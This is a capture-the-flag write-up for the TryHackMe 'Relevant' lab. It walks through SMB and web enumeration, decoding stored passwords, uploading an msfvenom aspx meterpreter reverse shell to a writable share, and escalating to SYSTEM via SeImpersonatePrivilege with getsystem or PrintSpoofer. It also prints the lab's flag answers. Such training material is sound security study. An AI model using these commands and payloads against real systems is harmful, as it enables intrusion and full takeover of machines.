This is a writeup for the Relevant room, available on TryHackMe.

Today's system vulnerability is based on Token Impersonalization. In order for this to work, we need a tool that uses a named pipe to deceive an NT AUTHORITY\SYSTEM account into connecting and authenticating an RPC server they control by exploiting some characteristics of the Istorage COM interface. The RottenPotato and RogueWinRm Exploits are widely used to exploit this vulnerability.

Introduction

Room Description

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Notes & Observations

Gaining access to the machine: there is a strange nt4wrksv folder that can be found among the SMB shares and on the website as well
I described the automated way of gaining root access (Metasploit's getsystem command). Behind the scenes, the tool creates a pipe server with limited privileges, after which it configures a Windows service (the client) to connect to the pipe created by the server. If you want to do it manually, then:
- Create simple reverse shell ( shell_reverse_tcp instead of meterpreter/reverse_tcp)
- Get the PrintSpoofer from GitHub
- Upload it to the shared SMB folder and find this folder on the target machine
- Execute PrintSpoofer.exe -i -c cmd on the target machine
It took me a lot of time to enumerate the websites and find the nt4wrksv folder
The credentials I found on the SMB didn't help much

Used tools: nmap, smbclient, ffuf, msfvenom, Metaslpoit, base64, PrintSpoofer.exe

Walkthrough

This chapter contains the all the steps necessary to answer the questions in this room.

Enumerate the Website

Run full nmap scan:
```
nmap <IP> -sS -Pn -n -sV -p-
```

Run directory search on the website on 49663 port to find the nt4wrksv folder:

ffuf -u http://<IP>:49663/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

Check the nt4wrksv folder in the browser:
Check if you can access the passwords.txt file from this folder:

Enumerate SMB

Check SMB shares with smbclient, when asks for password, hit enter:
```
smbclient -L //<IP>
```
Check the SMB shares with nmap scripts:
```
nmap <IP> -p139,445 --script=smb-enum-users,smb-enum-shares
```
We have read/write access as guest users in the nt4wrksv folder.
Access the nt4wrksv share and list its content:
```
smbclient //<IP>/nt4wrksv
```
Read the content of the passwords.txt file:
```
get passwords.txt -
```

Decode these two rows found in passwords.txt with base64:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" -n | base64 -d
Bob - !P@$$W0rD!123
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$

User Flag

Answer: THM{fdk4ka34vk346ksxfr21tg789ktf45}

Create aspx reverse shell with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4440 -f aspx > shell.aspx

Put it into the nt4wrksv SMB share by using the guest user or with Bob's credentials:
```
smbclient //<IP>/ntwrksv -U guest
put shell.aspx
```
Prepare multi handler meterpreter listener in Metaslpoit:
Run the reverse shell in the browser and catch it with the listener:
```
http://<IP>:49/nt4wrksv/shell.aspx
```
Get the user.txt file in this folder C:\users\bob\Desktop\user.txt:

Root Flag

Answer: THM{1fk5kf469devly1gl320zafgl345pv}

Check the account's privileges:
```
woami /priv
```
It has SeImpersonatePrivilege that can be abused, with Metasploit you can automatically gain root access. If you want to do it manually, then follow the description at the beginning of this writeup.
Use getsystem command to gain root privileges:

Get the root.txt file in this folder C:\users\Administrator\Desktop\root.txt:

References

More on the PrintSpoofer topic can be found here
Pictures used for the cover: detective, keyboard

Securiosity